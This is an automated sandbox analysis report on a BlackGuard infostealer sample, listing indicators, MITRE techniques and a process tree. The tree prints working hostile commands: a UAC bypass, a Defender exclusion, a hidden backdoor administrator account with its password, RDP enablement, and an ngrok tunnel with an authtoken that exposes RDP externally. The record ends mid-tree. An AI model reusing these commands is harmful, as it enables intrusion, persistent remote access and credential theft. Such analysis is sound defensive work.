blackguard | eb405e175ae16fd8877aa87ffdb39f0d4f41cf7c77351708d84f44dd790c35d2

Analysis

max time kernel
150s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2023 12:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Build_2s.exe
Size

3.3MB
MD5

1c2b15ed1c8897bb466ec6f1a0f3e815
SHA1

b2faf832c9a2e0d7210374560cfff65406659884
SHA256

eb405e175ae16fd8877aa87ffdb39f0d4f41cf7c77351708d84f44dd790c35d2
SHA512

9df20f4a26972e6bbc5ce2e01a139793077781900f5c304a4239f52d73c1b1653a58f21c725b95371fe5ac4106761dae7b90b71722ee32a87c19517a0d4f8961
SSDEEP

98304:4QBNUcwti78OqJ7TPBsHgMWJ0bJpqcV/:/zUcwti7TQlsBWJq1x

Score

10^/10

blackguard collection evasion persistence spyware stealer upx

Malware Config

Extracted

Family

blackguard

http://94.142.138.111

Signatures

BlackGuard
Infostealer first seen in Late 2021.
stealer blackguard
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
4536	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	vhttd.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
3424	attrib.exe

Allows Network login with blank passwords 1 TTPs 1 IoCs

Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol

T1076

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	Build_2s.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation	Build_2s.exe

Executes dropped EXE 3 IoCs

pid	Process
1228	ngrok.exe
556	ngrok.exe
1040	vhttd.exe

Loads dropped DLL 1 IoCs

pid	Process
2036	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00120000000231fd-266.dat	upx
behavioral2/files/0x00120000000231fd-267.dat	upx
behavioral2/memory/1040-268-0x0000000000400000-0x0000000000592000-memory.dmp	upx
behavioral2/files/0x0006000000023203-272.dat	upx
behavioral2/files/0x0006000000023203-273.dat	upx
behavioral2/memory/2036-275-0x00007FF90E9A0000-0x00007FF90E9C6000-memory.dmp	upx
behavioral2/memory/1040-276-0x0000000000400000-0x0000000000592000-memory.dmp	upx

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Build_2s.exe
Key opened	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Build_2s.exe
Key opened	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Build_2s.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GJWyfUU = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Build_2s.exe\""	Build_2s.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	vhttd.exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	Build_2s.exe
File created	F:\autorun.inf	Build_2s.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	vhttd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	vhttd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	vhttd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	75	Go-http-client/1.1

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command	Build_2s.exe
Key deleted	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/vhttd.exe -i"	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe tcp 3389"	Build_2s.exe
Key created	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	Build_2s.exe
Key deleted	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command	Build_2s.exe
Key deleted	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/Snup.bat"	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe config add-authtoken 2PDLmCpAc15rqXLc5UciTovK3D0_4ATiYujFG1vzipB7hfDgs"	Build_2s.exe
Key created	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings	Build_2s.exe
Key created	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open	Build_2s.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell\Open\command\ = "powershell.exe -command Add-MpPreference -ExclusionPath C:\\"	Build_2s.exe
Key deleted	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\ms-settings\Shell	Build_2s.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ngrok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ngrok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ngrok.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1200	Build_2s.exe
1200	Build_2s.exe
2888	PowerShell.exe
2888	PowerShell.exe
1200	Build_2s.exe
2356	PowerShell.exe
2356	PowerShell.exe
804	PowerShell.exe
804	PowerShell.exe
4340	PowerShell.exe
4340	PowerShell.exe
2188	PowerShell.exe
2188	PowerShell.exe
2036	svchost.exe
2036	svchost.exe
2036	svchost.exe
2036	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1200	Build_2s.exe
Token: SeDebugPrivilege	2888	PowerShell.exe
Token: SeDebugPrivilege	2356	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4108	WMIC.exe
Token: SeSecurityPrivilege	4108	WMIC.exe
Token: SeTakeOwnershipPrivilege	4108	WMIC.exe
Token: SeLoadDriverPrivilege	4108	WMIC.exe
Token: SeSystemProfilePrivilege	4108	WMIC.exe
Token: SeSystemtimePrivilege	4108	WMIC.exe
Token: SeProfSingleProcessPrivilege	4108	WMIC.exe
Token: SeIncBasePriorityPrivilege	4108	WMIC.exe
Token: SeCreatePagefilePrivilege	4108	WMIC.exe
Token: SeBackupPrivilege	4108	WMIC.exe
Token: SeRestorePrivilege	4108	WMIC.exe
Token: SeShutdownPrivilege	4108	WMIC.exe
Token: SeDebugPrivilege	4108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4108	WMIC.exe
Token: SeRemoteShutdownPrivilege	4108	WMIC.exe
Token: SeUndockPrivilege	4108	WMIC.exe
Token: SeManageVolumePrivilege	4108	WMIC.exe
Token: 33	4108	WMIC.exe
Token: 34	4108	WMIC.exe
Token: 35	4108	WMIC.exe
Token: 36	4108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4108	WMIC.exe
Token: SeSecurityPrivilege	4108	WMIC.exe
Token: SeTakeOwnershipPrivilege	4108	WMIC.exe
Token: SeLoadDriverPrivilege	4108	WMIC.exe
Token: SeSystemProfilePrivilege	4108	WMIC.exe
Token: SeSystemtimePrivilege	4108	WMIC.exe
Token: SeProfSingleProcessPrivilege	4108	WMIC.exe
Token: SeIncBasePriorityPrivilege	4108	WMIC.exe
Token: SeCreatePagefilePrivilege	4108	WMIC.exe
Token: SeBackupPrivilege	4108	WMIC.exe
Token: SeRestorePrivilege	4108	WMIC.exe
Token: SeShutdownPrivilege	4108	WMIC.exe
Token: SeDebugPrivilege	4108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4108	WMIC.exe
Token: SeRemoteShutdownPrivilege	4108	WMIC.exe
Token: SeUndockPrivilege	4108	WMIC.exe
Token: SeManageVolumePrivilege	4108	WMIC.exe
Token: 33	4108	WMIC.exe
Token: 34	4108	WMIC.exe
Token: 35	4108	WMIC.exe
Token: 36	4108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2672	WMIC.exe
Token: SeSecurityPrivilege	2672	WMIC.exe
Token: SeTakeOwnershipPrivilege	2672	WMIC.exe
Token: SeLoadDriverPrivilege	2672	WMIC.exe
Token: SeSystemProfilePrivilege	2672	WMIC.exe
Token: SeSystemtimePrivilege	2672	WMIC.exe
Token: SeProfSingleProcessPrivilege	2672	WMIC.exe
Token: SeIncBasePriorityPrivilege	2672	WMIC.exe
Token: SeCreatePagefilePrivilege	2672	WMIC.exe
Token: SeBackupPrivilege	2672	WMIC.exe
Token: SeRestorePrivilege	2672	WMIC.exe
Token: SeShutdownPrivilege	2672	WMIC.exe
Token: SeDebugPrivilege	2672	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2672	WMIC.exe
Token: SeRemoteShutdownPrivilege	2672	WMIC.exe
Token: SeUndockPrivilege	2672	WMIC.exe
Token: SeManageVolumePrivilege	2672	WMIC.exe
Token: 33	2672	WMIC.exe
Token: 34	2672	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1200 wrote to memory of 1776	1200	Build_2s.exe	86
PID 1200 wrote to memory of 1776	1200	Build_2s.exe	86
PID 1776 wrote to memory of 2888	1776	fodhelper.exe	87
PID 1776 wrote to memory of 2888	1776	fodhelper.exe	87
PID 1200 wrote to memory of 724	1200	Build_2s.exe	89
PID 1200 wrote to memory of 724	1200	Build_2s.exe	89
PID 724 wrote to memory of 2356	724	fodhelper.exe	90
PID 724 wrote to memory of 2356	724	fodhelper.exe	90
PID 2356 wrote to memory of 4220	2356	PowerShell.exe	93
PID 2356 wrote to memory of 4220	2356	PowerShell.exe	93
PID 4220 wrote to memory of 2280	4220	cmd.exe	94
PID 4220 wrote to memory of 2280	4220	cmd.exe	94
PID 2280 wrote to memory of 4108	2280	cmd.exe	95
PID 2280 wrote to memory of 4108	2280	cmd.exe	95
PID 2280 wrote to memory of 3492	2280	cmd.exe	96
PID 2280 wrote to memory of 3492	2280	cmd.exe	96
PID 4220 wrote to memory of 2884	4220	cmd.exe	98
PID 4220 wrote to memory of 2884	4220	cmd.exe	98
PID 2884 wrote to memory of 556	2884	net.exe	97
PID 2884 wrote to memory of 556	2884	net.exe	97
PID 4220 wrote to memory of 2392	4220	cmd.exe	99
PID 4220 wrote to memory of 2392	4220	cmd.exe	99
PID 2392 wrote to memory of 2228	2392	net.exe	100
PID 2392 wrote to memory of 2228	2392	net.exe	100
PID 4220 wrote to memory of 1456	4220	cmd.exe	101
PID 4220 wrote to memory of 1456	4220	cmd.exe	101
PID 1456 wrote to memory of 2672	1456	cmd.exe	102
PID 1456 wrote to memory of 2672	1456	cmd.exe	102
PID 1456 wrote to memory of 4924	1456	cmd.exe	103
PID 1456 wrote to memory of 4924	1456	cmd.exe	103
PID 4220 wrote to memory of 4948	4220	cmd.exe	104
PID 4220 wrote to memory of 4948	4220	cmd.exe	104
PID 4948 wrote to memory of 4288	4948	net.exe	105
PID 4948 wrote to memory of 4288	4948	net.exe	105
PID 4220 wrote to memory of 440	4220	cmd.exe	106
PID 4220 wrote to memory of 440	4220	cmd.exe	106
PID 440 wrote to memory of 2264	440	net.exe	107
PID 440 wrote to memory of 2264	440	net.exe	107
PID 4220 wrote to memory of 3396	4220	cmd.exe	108
PID 4220 wrote to memory of 3396	4220	cmd.exe	108
PID 4220 wrote to memory of 3008	4220	cmd.exe	109
PID 4220 wrote to memory of 3008	4220	cmd.exe	109
PID 4220 wrote to memory of 1300	4220	cmd.exe	110
PID 4220 wrote to memory of 1300	4220	cmd.exe	110
PID 4220 wrote to memory of 4516	4220	cmd.exe	111
PID 4220 wrote to memory of 4516	4220	cmd.exe	111
PID 4220 wrote to memory of 4112	4220	cmd.exe	112
PID 4220 wrote to memory of 4112	4220	cmd.exe	112
PID 4220 wrote to memory of 2188	4220	cmd.exe	113
PID 4220 wrote to memory of 2188	4220	cmd.exe	113
PID 4220 wrote to memory of 3424	4220	cmd.exe	114
PID 4220 wrote to memory of 3424	4220	cmd.exe	114
PID 1200 wrote to memory of 2528	1200	Build_2s.exe	121
PID 1200 wrote to memory of 2528	1200	Build_2s.exe	121
PID 2528 wrote to memory of 804	2528	fodhelper.exe	123
PID 2528 wrote to memory of 804	2528	fodhelper.exe	123
PID 804 wrote to memory of 1228	804	PowerShell.exe	124
PID 804 wrote to memory of 1228	804	PowerShell.exe	124
PID 1200 wrote to memory of 2564	1200	Build_2s.exe	125
PID 1200 wrote to memory of 2564	1200	Build_2s.exe	125
PID 2564 wrote to memory of 4340	2564	fodhelper.exe	126
PID 2564 wrote to memory of 4340	2564	fodhelper.exe	126
PID 4340 wrote to memory of 556	4340	PowerShell.exe	128
PID 4340 wrote to memory of 556	4340	PowerShell.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3424	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Build_2s.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Build_2s.exe

C:\Users\Admin\AppData\Local\Temp\Build_2s.exe
"C:\Users\Admin\AppData\Local\Temp\Build_2s.exe"
1⤵
- Allows Network login with blank passwords
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Drops autorun.inf file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1200
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
    "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4108
      - C:\Windows\system32\find.exe
        
        Find "="
        6⤵
        
        PID:3492
    - - C:\Windows\system32\net.exe
        
        net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2884
    - - C:\Windows\system32\net.exe
        
        net localgroup Administrators BlackTeam /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2392
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators BlackTeam /add
        6⤵
        
        PID:2228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1456
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2672
      - C:\Windows\system32\find.exe
        
        Find "="
        6⤵
        
        PID:4924
    - - C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" BlackTeam /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4948
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add
        6⤵
        
        PID:4288
    - - C:\Windows\system32\net.exe
        
        net accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:440
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        6⤵
        
        PID:2264
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
        5⤵
        
        PID:3396
    - - C:\Windows\system32\reg.exe
        
        reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:3008
    - - C:\Windows\system32\reg.exe
        
        reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f
        5⤵
        
        PID:1300
    - - C:\Windows\system32\reg.exe
        
        reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:4516
    - - C:\Windows\system32\reg.exe
        
        reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:4112
    - - C:\Windows\system32\reg.exe
        
        reg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:2188
    - - C:\Windows\system32\attrib.exe
        
        attrib C:\users\BlackTeam +r +a +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3424
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
